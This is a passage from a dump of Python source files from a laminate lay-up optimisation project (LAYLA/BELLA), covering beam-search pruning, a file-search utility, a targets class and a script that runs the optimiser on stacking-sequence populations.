ply_counts_tab, np.s_[to_del], axis=0)\r\n obj_const_tab = np.delete(obj_const_tab, np.s_[to_del])\r\n\r\n if obj_const_tab.size == 0:\r\n raise Exception(\r\n 'Infeasible beam-search, increase the branching limits')\r\n\r\n # global pruning\r\n if last_group and local_level == group_size - 2:\r\n if obj_const_tab.size > parameters.global_node_limit_p:\r\n obj_const_to_del = np.copy(obj_const_tab)\r\n for counter in range(parameters.global_node_limit_p):\r\n my_min = np.argmin(obj_const_to_del)\r\n obj_const_to_del[my_min] = 6666\r\n to_keep = obj_const_to_del == 6666\r\n to_del = np.invert(to_keep).astype(int)\r\n to_del = [i for i, x in enumerate(to_del) if x]\r\n ss_bot_tab = [elem for ind, elem in enumerate(ss_bot_tab) \\\r\n if ind not in to_del]\r\n if not constraints.sym:\r\n ss_top_tab = [elem for ind, elem in enumerate(ss_top_tab) \\\r\n if ind not in to_del]\r\n lampam_tab = np.delete(lampam_tab, np.s_[to_del], axis=0)\r\n ply_counts_tab = np.delete(\r\n ply_counts_tab, np.s_[to_del], axis=0)\r\n obj_const_tab = np.delete(obj_const_tab, np.s_[to_del])\r\n\r\n elif local_level != group_size - 1:\r\n if obj_const_tab.size > parameters.global_node_limit:\r\n obj_const_to_del = np.copy(obj_const_tab)\r\n for counter in range(parameters.global_node_limit):\r\n my_min = np.argmin(obj_const_to_del)\r\n obj_const_to_del[my_min] = 6666\r\n to_keep = obj_const_to_del == 6666\r\n to_del = np.invert(to_keep).astype(int)\r\n to_del = [i for i, x in enumerate(to_del) if x]\r\n ss_bot_tab = [elem for ind, elem in enumerate(ss_bot_tab) \\\r\n if ind not in to_del]\r\n if not constraints.sym:\r\n ss_top_tab = [elem for ind, elem in enumerate(ss_top_tab) \\\r\n if ind not in to_del]\r\n lampam_tab = np.delete(lampam_tab, np.s_[to_del], axis=0)\r\n ply_counts_tab = np.delete(\r\n ply_counts_tab, np.s_[to_del], axis=0)\r\n obj_const_tab = np.delete(obj_const_tab, np.s_[to_del])\r\n\r\n ## return results\r\n if last_group:\r\n ss_bot_tab = np.copy(ss_final)\r\n if SAVE_SUCCESS_RATE:\r\n ss_final = np.array([ss_final[ind] \\\r\n for ind in range(len(obj_const_tab)) \\\r\n if obj_const_tab[ind] < 1e10])\r\n if ss_final.size == 0:\r\n results.n_designs_repaired_unique = 0\r\n else:\r\n results.n_designs_repaired_unique = np.unique(\r\n ss_final, axis=0).shape[0]\r\n\r\n # identification of the best leaf\r\n ind_baby = np.argmin(obj_const_tab)\r\n if obj_const_tab[ind_baby] > 0.99*1e10:\r\n raise Exception(\"\"\"\r\nNo successfull repair during beam search, increase the branching limits\"\"\")\r\n results.ss_best = ss_bot_tab[ind_baby]\r\n results.lampam_best = lampam_tab[ind_baby]\r\n results.ply_counts = ply_counts_tab[ind_baby]\r\n\r\n else:\r\n # identification of the best leaf\r\n ind_baby = np.argmin(obj_const_tab)\r\n if obj_const_tab[ind_baby] > 0.99*1e10:\r\n raise Exception(\"\"\"\r\nNo successfull repair during beam search, increase the branching limits\"\"\")\r\n results.ss_bot_best = ss_bot_tab[ind_baby]\r\n if not constraints.sym:\r\n results.ss_top_best = ss_top_tab[ind_baby]\r\n results.lampam_best = lampam_tab[ind_baby]\r\n results.ply_counts = ply_counts_tab[ind_baby]\r\n\r\n# t_end = time.time()\r\n# print('time beam search', t_end - t_beg)\r\n\r\n return results\r\n\r\n\r\nclass beamsearchResults():\r\n \" An object for storing the results of a ply group search in LAYLA\"\r\n def __init__(self):\r\n \"Initialise the results of a ply group search in LAYLA\"\r\n # solution stacking sequence\r\n self.ss_bot_best = None\r\n self.ss_top_best = None\r\n self.ss_best = None\r\n # solution lamination parameters\r\n self.lampam_best = None\r\n # solution lamination parameters at each outer step\r\n self.ply_counts = None\r\n # number of nodes reached in the search tree\r\n self.n_nodes = 0\r\n# # number of objective function calls\r\n# self.n_obj_func_calls = 0\r\n # number of nodes reached at the last level of the search tree\r\n self.n_designs_last_level = 0\r\n # number of repaired nodes reached at the last level of the search tree\r\n self.n_designs_repaired = 0\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n\r\n return f'''\r\nResults with LAYLA:\r\n\r\n Stacking sequence: {self.ss_best}\r\n Lamination parameters 1-4: {self.lampam_best[:4]}\r\n Lamination parameters 5-8: {self.lampam_best[4:8]}\r\n Lamination parameters 9-12: {self.lampam_best[8:]}\r\n'''\r\n"
},
{
"alpha_fraction": 0.5332326292991638,
"alphanum_fraction": 0.5347431898117065,
"avg_line_length": 34.88888931274414,
"blob_id": "15f8e74e015cc39e1cc2fe279bb3b521784e997d",
"content_id": "bc0b05fa92f880f046392c83d660b5602e58a253",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 662,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 18,
"path": "/src/divers/find_in_files.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "import os\r\nimport fnmatch\r\n\r\ndef find_in_files(directory, find, filePattern):\r\n print(find)\r\n for path, dirs, files in os.walk(os.path.abspath(directory)):\r\n for filename in fnmatch.filter(files, filePattern):\r\n filepath = os.path.join(path, filename)\r\n with open(filepath) as f:\r\n s = f.readlines()\r\n for ind_line, line in enumerate(s):\r\n if find in line:\r\n print(\" Found in \" + filepath \\\r\n + \" at line \" + str(ind_line + 1))\r\n\r\ndirectory = r'C:\\BELLA'\r\nfind = \"calc_penalty_oopo_ss(\"\r\nfind_in_files(directory, find, '*.py')"
},
{
"alpha_fraction": 0.5561097264289856,
"alphanum_fraction": 0.576059877872467,
"avg_line_length": 30.73469352722168,
"blob_id": "5d4ca955d71038dc80e4639a8ecc503d350ac4b3",
"content_id": "d36c8e06ef4acad5e28a241a38cb732844458553",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1604,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 49,
"path": "/src/LAYLA_V02/targets.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for optimisation targets\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\nclass Targets():\r\n \"\"\"\r\n An object for storing the targets of laminate lay-up optimisations\r\n \"\"\"\r\n def __init__(self, n_plies, lampam=np.zeros((12,), float), stack=None):\r\n \" Create targets of laminate lay-up optimisations\"\r\n self.lampam_initial = np.copy(lampam)\r\n self.lampam = np.copy(lampam)\r\n self.n_plies = n_plies\r\n self.stack = stack\r\n \r\n def filter_target_lampams(self, constraints):\r\n \"\"\"\r\n filters applied to the lamination parameters to account for orthotropy \r\n \"\"\"\r\n # If symmetry is desired, the corresponding target amination parameters \r\n # must be set to 0\r\n if constraints.sym:\r\n self.lampam[4:8] = 0\r\n # If the in-plane orthotropy is desired, the corresponding target\r\n # lamination parameters must be set to 0\r\n if constraints.ipo:\r\n self.lampam[2] = 0\r\n self.lampam[3] = 0\r\n # If the out-of-plane orthotropy is desired, the corresponding target\r\n # lamination parameters must be set to 0\r\n if constraints.oopo:\r\n self.lampam[10] = 0\r\n self.lampam[11] = 0\r\n \r\n def __repr__(self):\r\n \" Display object \"\r\n return f'''\r\nTargets:\r\n \r\n Lamination parameters 1-4: {self.lampam[:4]}\r\n Lamination parameters 5-8: {self.lampam[4:8]}\r\n Lamination parameters 9-12: {self.lampam[8:]}\r\n Number of plies: {self.n_plies}\r\n'''\r\n"
},
{
"alpha_fraction": 0.5333296656608582,
"alphanum_fraction": 0.5726591944694519,
"avg_line_length": 40.15081024169922,
"blob_id": "a953d276c8869d0cae81ac677a88de859f2d4b63",
"content_id": "62a6cb039d9b299326287328ed1781835dd18a96",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 36334,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 862,
"path": "/src/LAYLA_V02/scripts/run_LAYLA_V02_SSpop.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nLAYLA retrieves the LAminate LAY-ups from lamination parameters\r\n\r\nLAYLA_sspop is a script applying the optimiser LAYLA to sets of target\r\nlamination parameters.\r\n\r\nThese lamination parameters come from input files and are associated to the\r\npoulations of stacking sequences created in the folder Populations.\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport time\r\nimport sys\r\nsys.path.append(r'C:\\BELLA_and_LAYLA')\r\nfrom src.LAYLA_V02.parameters import Parameters\r\nfrom src.LAYLA_V02.constraints import Constraints\r\nfrom src.LAYLA_V02.targets import Targets\r\nfrom src.LAYLA_V02.optimiser import LAYLA_optimiser\r\nfrom src.LAYLA_V02.materials import Material\r\nfrom src.LAYLA_V02.objectives import objectives\r\nfrom src.guidelines.ipo_oopo import ipo_param_1_12\r\nfrom src.guidelines.ipo_oopo import calc_penalty_ipo_param\r\nfrom src.guidelines.ten_percent_rule import calc_penalty_10_ss\r\nfrom src.CLA.ABD import A_from_lampam, B_from_lampam, D_from_lampam\r\n\r\nfrom src.divers.excel import autofit_column_widths\r\nfrom src.divers.excel import delete_file\r\nfrom src.LAYLA_V02.save_set_up import save_constraints_LAYLA\r\nfrom src.LAYLA_V02.save_set_up import save_parameters_LAYLA_V02\r\nfrom src.LAYLA_V02.save_set_up import save_materials\r\n\r\nfrom src.divers.pretty_print import print_lampam, print_ss, print_list_ss\r\n\r\n#==============================================================================\r\n# Target population\r\n#==============================================================================\r\n# Number of plies\r\nn_plies = 40\r\n#n_plies = 80\r\n#n_plies = 200\r\n#==============================================================================\r\n# Results saving\r\n#==============================================================================\r\nfilename_end = ''\r\n#==============================================================================\r\n# Type of optimisations\r\n#==============================================================================\r\noptimisation_type = 'A'\r\noptimisation_type = 'D'\r\noptimisation_type = 'AD'\r\n#==============================================================================\r\n# design and manufacturing constraints\r\n#==============================================================================\r\n### Set of design and manufacturing constraints:\r\nconstraints_set = 'C0'\r\nconstraints_set = 'C1'\r\n# C0: - No design and manufacturing constraints other than symmetry\r\n# C1: - in-plane orthotropy enforced with penalties and repair\r\n# - 10% rule enforced with repair\r\n# - 10% 0deg plies\r\n# - 10% 90 deg plies\r\n# - 5% 45deg plies\r\n# - 5% -45 deg plies\r\n# - disorientation rule with Delta(theta) = 45 deg\r\n# - contiguity rule with n_contig = 5\r\n\r\n# set of admissible fibre orientations\r\nset_of_angles = np.array([-45, 0, 45, 90], dtype=int)\r\n#set_of_angles = np.array([-45, 0, 45, 90, +30, -30, +60, -60], dtype=int)\r\n\r\n# symmetry\r\nsym = True\r\n\r\n# balance and in-plane orthotropy requirements\r\nif constraints_set == 'C0':\r\n bal = False\r\n ipo = False\r\nelse:\r\n bal = True\r\n ipo = True\r\n\r\n# out-of-plane orthotropy requirements\r\noopo = False\r\n\r\n# damage tolerance\r\n# rule 1: one outer ply at + or -45 deg at laminate surfaces\r\n# rule 2: [+45, -45] or [-45, +45] plies at laminate surfaces\r\n# rule 3: [+45, -45], [+45, +45], [-45, -45] or [-45, +45] plies at laminate\r\n# surfaces\r\ndam_tol = False\r\ndam_tol_rule = 0\r\n#if constraints_set == 'C0':\r\n# dam_tol = False\r\n# dam_tol_rule = 0\r\n#else:\r\n# dam_tol = True\r\n# dam_tol_rule = 1\r\n# dam_tol_rule = 2\r\n## dam_tol_rule = 3\r\n\r\n# 10% rule\r\nif constraints_set == 'C0':\r\n rule_10_percent = False\r\nelse:\r\n rule_10_percent = True\r\ncombine_45_135 = True\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 0 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 0 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 = 10 # percentage used in the 10% rule for +-45 deg plies\r\n\r\n# disorientation\r\nif constraints_set == 'C0':\r\n diso = False\r\nelse:\r\n diso = True\r\n\r\n# Upper bound of the variation of fibre orientation between two\r\n# contiguous plies if the disorientation constraint is active\r\ndelta_angle = 45\r\n\r\n# contiguity\r\nif constraints_set == 'C0':\r\n contig = False\r\nelse:\r\n contig = True\r\n\r\nn_contig = 5\r\n# No more that constraints.n_contig plies with same fibre orientation should be\r\n# next to each other if the contiguity constraint is active. The value taken\r\n# can only be 2, 3, 4 or 5, otherwise test functions should be modified\r\n\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n ipo=ipo,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n rule_10_percent=rule_10_percent,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles)\r\n\r\n#==============================================================================\r\n# Material properties\r\n#==============================================================================\r\n# Elastic modulus in the fibre direction (Pa)\r\nE11 = 130e9\r\n# Elastic modulus in the transverse direction (Pa)\r\nE22 = 9e9\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.3\r\n# In-plane shear modulus (Pa)\r\nG12 = 4e9\r\nmat_prop = Material(E11 = E11, E22 = E22, G12 = G12, nu12 = nu12)\r\n\r\n#==============================================================================\r\n# Optimiser Parameters\r\n#==============================================================================\r\n# number of outer loops\r\nn_outer_step = 5\r\n\r\n# branching limit for global pruning during ply orientation optimisation\r\nglobal_node_limit = 50\r\n# branching limit for local pruning during ply orientation optimisation\r\nlocal_node_limit = 100\r\n# branching limit for global pruning at the penultimate level during ply\r\n# orientation optimisation\r\nglobal_node_limit_p = 50\r\n# branching limit for local pruning at the last level during ply\r\n# orientation optimisation\r\nlocal_node_limit_final = 1\r\n\r\n### Techniques to enforce the constraints\r\n# repair to improve the convergence towards the in-plane lamination parameter\r\n# targets\r\nrepair_membrane_switch = True\r\n# repair to improve the convergence towards the out-of-plane lamination\r\n# parameter targets\r\nrepair_flexural_switch = True\r\n\r\n# penalty for the 10% rule based on ply count restrictions\r\npenalty_10_pc_switch = False\r\n# penalty for the 10% rule based on lamination parameter restrictions\r\npenalty_10_lampam_switch = False\r\n# penalty for in-plane orthotropy, based on lamination parameters\r\npenalty_ipo_switch = False\r\n# penalty for balance, based on ply counts\r\npenalty_bal_switch = False\r\n\r\nif constraints_set == 'C0':\r\n # penalty for the 10% rule based on ply count restrictions\r\n penalty_10_pc_switch = False\r\n # penalty for the 10% rule based on lamination parameter restrictions\r\n penalty_10_lampam_switch = False\r\n # penalty for in-plane orthotropy, based on lamination parameters\r\n penalty_ipo_switch = False\r\n # penalty for balance, based on ply counts\r\n penalty_bal_switch = False\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficients for the in-plane orthotropy penalty or the balance penalty\r\ncoeff_bal_ipo = 1\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n\r\n# percentage of laminate thickness for plies that can be modified during\r\n# the refinement of membrane properties\r\np_A = 80\r\n# number of plies in the last permutation during repair for disorientation\r\n# and/or contiguity\r\nn_D1 = 6\r\n# number of ply shifts tested at each step of the re-designing process during\r\n# refinement of flexural properties\r\nn_D2 = 10\r\n# number of times the algorithms 1 and 2 are repeated during the flexural\r\n# property refinement\r\nn_D3 = 2\r\n\r\n### Other parameters\r\n\r\n# Minimum group size allowed for the smallest groups\r\ngroup_size_min = 5\r\n# Desired number of plies for the groups at each outer loop\r\ngroup_size_max = np.array([1000, 8, 8, 8, 8])\r\n\r\n# Lamination parameters to be considered in the multi-objective functions\r\nif optimisation_type == 'A':\r\n if constraints.set_of_angles is np.array([-45, 0, 45, 90], int):\r\n lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\r\n else:\r\n lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])\r\nif optimisation_type == 'D':\r\n if constraints.set_of_angles is np.array([-45, 0, 45, 90], int):\r\n lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])\r\nif optimisation_type == 'AD':\r\n if constraints.set_of_angles is np.array([-45, 0, 45, 90], int):\r\n lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n else:\r\n lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])\r\n\r\n# Lamination parameters sensitivities from the first-lebel optimiser\r\nfirst_level_sensitivities = np.ones((12,), float)\r\n\r\nparameters = Parameters(\r\n constraints=constraints,\r\n coeff_10=coeff_10,\r\n coeff_bal_ipo=coeff_bal_ipo,\r\n coeff_oopo=coeff_oopo,\r\n p_A=p_A,\r\n n_D1=n_D1,\r\n n_D2=n_D2,\r\n n_D3=n_D3,\r\n n_outer_step=n_outer_step,\r\n group_size_min=group_size_min,\r\n group_size_max=group_size_max,\r\n first_level_sensitivities=first_level_sensitivities,\r\n lampam_to_be_optimised=lampam_to_be_optimised,\r\n global_node_limit=global_node_limit,\r\n local_node_limit=local_node_limit,\r\n global_node_limit_p=global_node_limit_p,\r\n local_node_limit_final=local_node_limit_final,\r\n repair_membrane_switch=repair_membrane_switch,\r\n repair_flexural_switch=repair_flexural_switch,\r\n penalty_10_lampam_switch=penalty_10_lampam_switch,\r\n penalty_10_pc_switch=penalty_10_pc_switch,\r\n penalty_ipo_switch=penalty_ipo_switch,\r\n penalty_bal_switch=penalty_bal_switch)\r\n\r\n#==============================================================================\r\n# DO NOT CHANGE FROM THIS POINT\r\n#==============================================================================\r\nresult_filename = constraints_set + '-' + str(n_plies) + 'plies-' \\\r\n+ optimisation_type + filename_end + '.xlsx'\r\ndelete_file(result_filename)\r\n\r\n### Import the target lamination parameters\r\nif constraints_set == 'C0':\r\n data_filename = '/LAYLA_and_BELLA/populations/pop_sym_C0_' \\\r\n + str(n_plies) + 'plies.xlsx'\r\nelse:\r\n data_filename = '/LAYLA_and_BELLA/populations/pop_sym_C1_' \\\r\n + str(n_plies) + 'plies.xlsx'\r\n\r\n### Import the target lamination parameters\r\ndata = pd.read_excel(data_filename, sheet_name='stacks')\r\nif data.size == 0:\r\n raise Exception(\r\n 'Oops, no population of target lamination parameters found')\r\n\r\n### Initialisation of the result columns\r\ntable_result = pd.DataFrame()\r\n\r\n#==========================================================================\r\n# Optimiser Runs\r\n#==========================================================================\r\nfor i in range(len(data.index)):\r\n#for i in range(0, 1):\r\n\r\n print('\\n ipop', i)\r\n ### Store targets\r\n n_plies_lam = data.loc[i, 'ply_counts']\r\n # Stacking sequence considered for the 'layerwise_ss' approach\r\n ss_ini = 0*np.ones((n_plies_lam,), dtype=int)\r\n lampam_target = np.empty((12,), float)\r\n lampam_target[0] = data.loc[i, 'lampam[1]']\r\n lampam_target[1] = data.loc[i, 'lampam[2]']\r\n lampam_target[2] = data.loc[i, 'lampam[3]']\r\n lampam_target[3] = data.loc[i, 'lampam[4]']\r\n lampam_target[4] = data.loc[i, 'lampam[5]']\r\n lampam_target[5] = data.loc[i, 'lampam[6]']\r\n lampam_target[6] = data.loc[i, 'lampam[7]']\r\n lampam_target[7] = data.loc[i, 'lampam[8]']\r\n lampam_target[8] = data.loc[i, 'lampam[9]']\r\n lampam_target[9] = data.loc[i, 'lampam[10]']\r\n lampam_target[10] = data.loc[i, 'lampam[11]']\r\n lampam_target[11] = data.loc[i, 'lampam[12]']\r\n\r\n N0_Target = data.loc[i, 'N0']\r\n N90_Target = data.loc[i, 'N90']\r\n N45_Target = data.loc[i, 'N45']\r\n N135_Target = data.loc[i, 'N-45']\r\n\r\n ss_target = data.loc[i, 'ss']\r\n\r\n A11_target = data.loc[i, 'A11']\r\n A22_target = data.loc[i, 'A22']\r\n A12_target = data.loc[i, 'A12']\r\n A66_target = data.loc[i, 'A66']\r\n A16_target = data.loc[i, 'A16']\r\n A26_target = data.loc[i, 'A26']\r\n\r\n B11_target = data.loc[i, 'B11']\r\n B22_target = data.loc[i, 'B22']\r\n B12_target = data.loc[i, 'B12']\r\n B66_target = data.loc[i, 'B66']\r\n B16_target = data.loc[i, 'B16']\r\n B26_target = data.loc[i, 'B26']\r\n\r\n D11_target = data.loc[i, 'D11']\r\n D22_target = data.loc[i, 'D22']\r\n D12_target = data.loc[i, 'D12']\r\n D66_target = data.loc[i, 'D66']\r\n D16_target = data.loc[i, 'D16']\r\n D26_target = data.loc[i, 'D26']\r\n\r\n targets = Targets(\r\n n_plies=n_plies_lam, lampam=lampam_target, stack=ss_target)\r\n# print('target', ss_target)\r\n\r\n ### Algorithm run\r\n print(f'Algorithm running.')\r\n print('Laminate type: ', constraints.laminate_scheme)\r\n print('Laminate type of the target stacking sequences: ',\r\n constraints.laminate_scheme_test)\r\n\r\n t = time.time()\r\n result = LAYLA_optimiser(parameters, constraints, targets, mat_prop)\r\n elapsed1 = time.time() - t\r\n\r\n ### Results processing and display\r\n if not result.completed:\r\n\r\n # Laminate ply count\r\n table_result.loc[i, 'ply count'] = n_plies_lam\r\n\r\n # number of the outer loop with the best results\r\n table_result.loc[i, 'best outer loop'] = np.NaN\r\n\r\n # Computational time in s\r\n table_result.loc[i, 'time (s)'] = np.NaN\r\n\r\n# # Number of objective function evaluations\r\n# table_result.loc[i, 'Number of objective function evaluations'] = \\\r\n# np.NaN\r\n\r\n # Number of iterations\r\n table_result.loc[i, 'n_outer_step_performed'] = np.NaN\r\n\r\n # objective\r\n table_result.loc[\r\n i, 'objective with initial lamination parameter weightings'] \\\r\n = np.NaN\r\n table_result.loc[\r\n i, 'objective with modified lamination parameter weightings'] \\\r\n = np.NaN\r\n\r\n # Inhomogeneity factor\r\n table_result.loc[i, 'target inhomogeneity factor'] = \\\r\n np.linalg.norm(lampam_target[0:4] - lampam_target[8:12])\r\n\r\n # objectives\r\n for k in range(parameters.n_outer_step):\r\n table_result.loc[i, f'objective iteration {k+1}'] = np.NaN\r\n\r\n # lampam_target - lampamRetrieved\r\n table_result.loc[i, 'error1 = abs(lampam_target[1]-lampam[1])'] \\\r\n = np.NaN\r\n table_result.loc[i, 'error2'] = np.NaN\r\n table_result.loc[i, 'error3'] = np.NaN\r\n table_result.loc[i, 'error4'] = np.NaN\r\n table_result.loc[i, 'error5'] = np.NaN\r\n table_result.loc[i, 'error6'] = np.NaN\r\n table_result.loc[i, 'error7'] = np.NaN\r\n table_result.loc[i, 'error8'] = np.NaN\r\n table_result.loc[i, 'error9'] = np.NaN\r\n table_result.loc[i, 'error10'] = np.NaN\r\n table_result.loc[i, 'error11'] = np.NaN\r\n table_result.loc[i, 'error12'] = np.NaN\r\n\r\n # lampam_target\r\n table_result.loc[i, 'lampam_target[1]'] = lampam_target[0]\r\n table_result.loc[i, 'lampam_target[2]'] = lampam_target[1]\r\n table_result.loc[i, 'lampam_target[3]'] = lampam_target[2]\r\n table_result.loc[i, 'lampam_target[4]'] = lampam_target[3]\r\n table_result.loc[i, 'lampam_target[5]'] = lampam_target[4]\r\n table_result.loc[i, 'lampam_target[6]'] = lampam_target[5]\r\n table_result.loc[i, 'lampam_target[7]'] = lampam_target[6]\r\n table_result.loc[i, 'lampam_target[8]'] = lampam_target[7]\r\n table_result.loc[i, 'lampam_target[9]'] = lampam_target[8]\r\n table_result.loc[i, 'lampam_target[10]'] = lampam_target[9]\r\n table_result.loc[i, 'lampam_target[11]'] = lampam_target[10]\r\n table_result.loc[i, 'lampam_target[12]'] = lampam_target[11]\r\n\r\n # Retrieved stacking sequence at step 1\r\n table_result.loc[i, 'ss retrieved at step 1'] = np.NaN\r\n\r\n # Retrieved stacking sequence\r\n table_result.loc[i, 'ss retrieved'] = np.NaN\r\n\r\n # Target stacking sequence\r\n ss_flatten = np.array(ss_target, dtype=str)\r\n #ss_flatten = ' '.join(ss_flatten)\r\n table_result.loc[i, 'ss target'] = ss_flatten\r\n\r\n # Ply counts\r\n table_result.loc[i, 'N0_target'] = N0_Target\r\n table_result.loc[i, 'N90_target'] = N90_Target\r\n table_result.loc[i, 'N45_target'] = N45_Target\r\n table_result.loc[i, 'N-45_target'] = N135_Target\r\n table_result.loc[i, 'N0 - N0_target'] = np.NaN\r\n table_result.loc[i, 'N90 - N90_target'] = np.NaN\r\n table_result.loc[i, 'N45 - N45_target'] = np.NaN\r\n table_result.loc[i, 'N-45 - N-45_target'] = np.NaN\r\n table_result.loc[i, 'penalty value for the 10% rule'] = np.NaN\r\n\r\n for ind in range(n_outer_step):\r\n # numbers of stacks at the last level of the last group search\r\n table_result.loc[i, 'n_designs_last_level ' + str(ind + 1)] \\\r\n = np.NaN\r\n # numbers of repaired stacks at the last group search\r\n table_result.loc[i, 'n_designs_repaired ' + str(ind + 1)] \\\r\n = np.NaN\r\n # numbers of unique repaired stacks at the last group search\r\n table_result.loc[i, 'n_designs_repaired_unique ' + str(ind + 1)] \\\r\n = np.NaN\r\n\r\n # in-plane orthotropy\r\n table_result.loc[i, 'In-plane orthotropy parameter 1'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 2'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 3'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 4'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 5'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 6'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 7'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 8'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 9'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 10'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 11'] = np.NaN\r\n table_result.loc[i, 'In-plane orthotropy parameter 12'] = np.NaN\r\n\r\n table_result.loc[i, 'diff A11 percentage'] = np.NaN\r\n table_result.loc[i, 'diff A22 percentage'] = np.NaN\r\n table_result.loc[i, 'diff A12 percentage'] = np.NaN\r\n table_result.loc[i, 'diff A66 percentage'] = np.NaN\r\n table_result.loc[i, 'diff A16 percentage'] = np.NaN\r\n table_result.loc[i, 'diff A26 percentage'] = np.NaN\r\n\r\n table_result.loc[i, 'diff B11 percentage'] = np.NaN\r\n table_result.loc[i, 'diff B22 percentage'] = np.NaN\r\n table_result.loc[i, 'diff B12 percentage'] = np.NaN\r\n table_result.loc[i, 'diff B66 percentage'] = np.NaN\r\n table_result.loc[i, 'diff B16 percentage'] = np.NaN\r\n table_result.loc[i, 'diff B26 percentage'] = np.NaN\r\n\r\n table_result.loc[i, 'diff D11 percentage'] = np.NaN\r\n table_result.loc[i, 'diff D22 percentage'] = np.NaN\r\n table_result.loc[i, 'diff D12 percentage'] = np.NaN\r\n table_result.loc[i, 'diff D66 percentage'] = np.NaN\r\n table_result.loc[i, 'diff D16 percentage'] = np.NaN\r\n table_result.loc[i, 'diff D26 percentage'] = np.NaN\r\n\r\n# table_result.loc[i, 'diff A11 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff A22 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff A12 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff A66 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff A16 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff A26 percentage - approx'] = np.NaN\r\n#\r\n# table_result.loc[i, 'diff D11 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff D22 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff D12 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff D66 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff D16 percentage - approx'] = np.NaN\r\n# table_result.loc[i, 'diff D26 percentage - approx'] = np.NaN\r\n else:\r\n\r\n print('Time', elapsed1)\r\n print('objective with modified lamination parameter weightings',\r\n result.objective)\r\n\r\n # Laminate ply count\r\n table_result.loc[i, 'Ply count'] = n_plies_lam\r\n\r\n # number of the outer loop with the best results\r\n table_result.loc[i, 'best outer loop'] \\\r\n = result.n_outer_step_best_solution\r\n\r\n # Computational time in s\r\n table_result.loc[i, 'time (s)'] = elapsed1\r\n\r\n# # Number of objective function evaluations\r\n# table_result.loc[i, 'Number of objective function evaluations'] \\\r\n# = \" \".join(result.n_obj_func_calls_tab.astype(str))\r\n\r\n # Number of iterations\r\n table_result.loc[i, 'n_outer_step_performed'] \\\r\n = result.number_of_outer_steps_performed\r\n\r\n # objective\r\n table_result.loc[\r\n i, 'objective with initial lamination parameter weightings'] \\\r\n = objectives(\r\n lampam=result.lampam,\r\n targets=targets,\r\n lampam_weightings=parameters.lampam_weightings_ini,\r\n constraints=constraints,\r\n parameters=parameters)\r\n\r\n table_result.loc[\r\n i, 'objective with modified lamination parameter weightings'] \\\r\n = result.objective\r\n\r\n # Inhomogeneity factor\r\n table_result.loc[i, 'target inhomogeneity factor'] \\\r\n = np.linalg.norm(lampam_target[0:4] - lampam_target[8:12])\r\n\r\n # objectives\r\n for k in range(parameters.n_outer_step):\r\n table_result.loc[\r\n i, f'objective iteration {k+1}'] = result.obj_tab[k]\r\n\r\n # lampam_target - lampamRetrieved\r\n table_result.loc[i, 'error1 = 